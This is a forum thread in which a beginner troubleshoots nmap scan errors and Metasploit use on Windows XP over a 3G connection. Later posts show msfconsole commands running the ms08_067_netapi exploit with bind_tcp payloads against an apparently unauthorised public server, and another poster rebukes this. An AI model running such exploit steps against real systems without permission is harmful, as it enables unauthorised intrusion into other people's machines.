Wehne I put this command nmap -v -n 220.127.116.11 on metasploit I get this error
Only ethernet devices can be used for raw scans on Windows, and
"ppp0" is not an ethernet device. Use the --unprivileged option
for this scan.
I apologize, but I do not know the commands in Windows. My recommendation is to download Kali Linux and use that for your purposes.
Downloads | Kali Linux
Kali Linux is an incredibly diverse platform and will significantly increase the answers to help in this forum. I wish you the best.
Make sure to have admin or root access. Check your network adapter. Use "--unprivileged" in your nmap scan if you can't fix it.
I try it but [-] Unknown command: --unprivileged.
I forget to tell you I use metasploite on windows xp SP3 as admin please help me
What nmap version do you have?
I have nmap 6.25
What version of metasploit are you running? This is available when msfconsole first starts and should look something like the following:
=[ metasploit v4.7.0-2013071701
This is my version, and when I ran your command:
msf> nmap -v -n [IPaddr]
The results were as expected. If you are running the latest version AND still having problems, check your ethernet port. From the Kali Linux command prompt, type: ifconfig
You should see eth0 and lo. If you have eth0:0, eth1:1, or even ppp0, then you'll want to bring those interfaces down and leave only eth0 running.
ifconfig eth1 down
ifconfig ppp0 down
Thanks this is my version =[ metasploit v4.7.0-1 [core:4.7 api:1.0]
can you give this commnds in windows I don't have LINUX
SO metasploit doesn't work on windows!!
no, no, I never said that! As a project, Metasploit is the gold standard for open sourced pentesting products on any platform. It must be understood though that there's lots of moving parts and diagnosing all those moving parts has to come down to somebody with experience in that area. And as i pointed out, I do not have the expertise in using Metasploit from a windows platform. Your question will, sooner or later, be answered by an expert in that area. But IMHO, users of Linux get questions answered faster as a result of the larger expertise base within the community of users/developers.
I use 3g modem connexion is that the probleme?
It could be. Here's the definitive answer from NMap:
To summarize the website: try adding "-sT -Pn" before the "-v" in your scan. It's a windows/nmap issue, NOT a metasploit issue.
Thanks alot nap_ thats help me a lot
I have this problem again
msf exploit(ms08_067_netapi) > set payload windows/patchupdllinject/bind_tcp
payload => windows/patchupdllinject/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: DLL.
msf exploit(ms08_067_netapi) >
The pathupdllinjectbind_tcp payload you are using require you to specify a custom DLL file that will be injected into the exploited process. Since you haven't specified any DLL file, the framework is displaying the error message. If you are unsure what all this means, just stick with the built-in payloads such as meterpreter/bind_tcp or shell/bind_tcp
I get this
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (18.104.22.168:445)
I don't want to be rude but you have no idea what you are doing. You are attacking a public server which I am sure you don't have any authorization to attack but even worse than that, you are attacking a machine which you don't even know is a Windows machine or a Linux one. If for a second you assume that is a Windows machine then SMB port on a public server is a strict no for any administrator.
In short, if you want to learn Metasploit, configure a machine in VirtualBox or VMWare and practice on it. Asking such questions on this forum or any other forum for that matter won't get you anywhere.
hacking elegal or what!!!
PPP devices aren't properly supported on Windows, this is a limitation of WinPcap (which is used by Nmap)
what about linux supported ppp or not and is there any tool like nmap that supported ppp on windows
I'm not 100% sure, but I believe this extends to libpcap as well. There is Microsoft's PortQry,(Which I've never used) but if it requires winpcap, I would imagine it would suffer the same problem. Sorry I couldn't be more definitive.
Retrieving data ...